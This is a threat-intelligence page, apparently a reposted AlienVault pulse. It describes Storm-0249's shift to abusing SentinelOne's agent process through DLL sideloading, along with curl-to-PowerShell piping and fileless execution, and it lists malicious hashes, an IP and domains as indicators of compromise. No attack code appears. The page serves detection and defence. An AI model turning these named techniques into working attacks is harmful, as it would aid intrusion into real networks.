Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation
Storm-0249, a seasoned initial access broker, has evolved from mass phishing to sophisticated post-exploitation tactics. The group now abuses legitimate Endpoint Detection and Response processes, particularly SentinelOne's SentinelAgentWorker.exe, through DLL sideloading. This allows them to conceal malicious activity as routine operations, bypass defenses, and maintain persistence. Their new tactics include Microsoft domain spoofing, curl-to-PowerShell piping, and fileless execution. Storm-0249's ability to weaponize trusted processes and conduct stealthy reconnaissance poses significant challenges for security teams. The group's evolution represents a broader trend in the ransomware-as-a-service ecosystem, lowering the technical barrier for attackers and accelerating the spread of ransomware across sectors.
Indicators of Compromise
- hash: aa157129a9df47ede836516dd4c7ec2d
- hash: d2237059bb738015b0878f99029be3a6
- hash: 07c5599b9bb00feb70c2d5e43b4b76f228866930
- hash: 423f2fcf7ed347ee57c1a3cffa14099ec16ad09c
- hash: 10910179af37ba38786f5a1b59d4dd1c43b6aa512850bbd47fb0feb965b2eb5c
- hash: 8113fc3b4f82fb49f8dd853ca8e1275e0dfb06e48f39830708e4437fe8afbdfb
- ip: 178.16.52.145
- domain: hristomasitomasdf.com
- domain: krivomadogolyhp.com
- domain: sgcipl.com
Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation
Description
Storm-0249, a seasoned initial access broker, has evolved from mass phishing to sophisticated post-exploitation tactics. The group now abuses legitimate Endpoint Detection and Response processes, particularly SentinelOne's SentinelAgentWorker.exe, through DLL sideloading. This allows them to conceal malicious activity as routine operations, bypass defenses, and maintain persistence. Their new tactics include Microsoft domain spoofing, curl-to-PowerShell piping, and fileless execution. Storm-0249's ability to weaponize trusted processes and conduct stealthy reconnaissance poses significant challenges for security teams. The group's evolution represents a broader trend in the ransomware-as-a-service ecosystem, lowering the technical barrier for attackers and accelerating the spread of ransomware across sectors.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://reliaquest.com/blog/threat-spotlight-storm-0249-precision-endpoint-exploitation"]
- Adversary
- Storm-0249
- Pulse Id
- 69393ab7f0d78ccb11a14d9a
- Threat Score
- null
Indicators of Compromise
Hash
| Value | Description | Copy |
|---|---|---|
hashaa157129a9df47ede836516dd4c7ec2d | — | |
hashd2237059bb738015b0878f99029be3a6 | — | |
hash07c5599b9bb00feb70c2d5e43b4b76f228866930 | — | |
hash423f2fcf7ed347ee57c1a3cffa14099ec16ad09c | — | |
hash10910179af37ba38786f5a1b59d4dd1c43b6aa512850bbd47fb0feb965b2eb5c | — | |
hash8113fc3b4f82fb49f8dd853ca8e1275e0dfb06e48f39830708e4437fe8afbdfb | — |
Ip
| Value | Description | Copy |
|---|---|---|
ip178.16.52.145 | — |
Domain
| Value | Description | Copy |
|---|---|---|
domainhristomasitomasdf.com | — | |
domainkrivomadogolyhp.com | — | |
domainsgcipl.com | — |
Threat ID: 69393d10fd479f45ea600b7f
Added to database: 12/10/2025, 9:27:44 AM
Last updated: 12/10/2025, 9:27:48 AM
Views: 1
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Deceptive Layoff-Themed HR Email Distributes Remcos RAT Malware
MediumRansomware IAB abuses EDR for stealthy malware execution
HighReact2Shell Deep Dive: CVE-2025-55182 Exploit Mechanics
MediumSTAC6565 Targets Canada in 80% of Attacks as Gold Blade Deploys QWCrypt Ransomware
HighHow Lazarus's IT Workers Scheme Was Caught Live on Camera
MediumActions
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.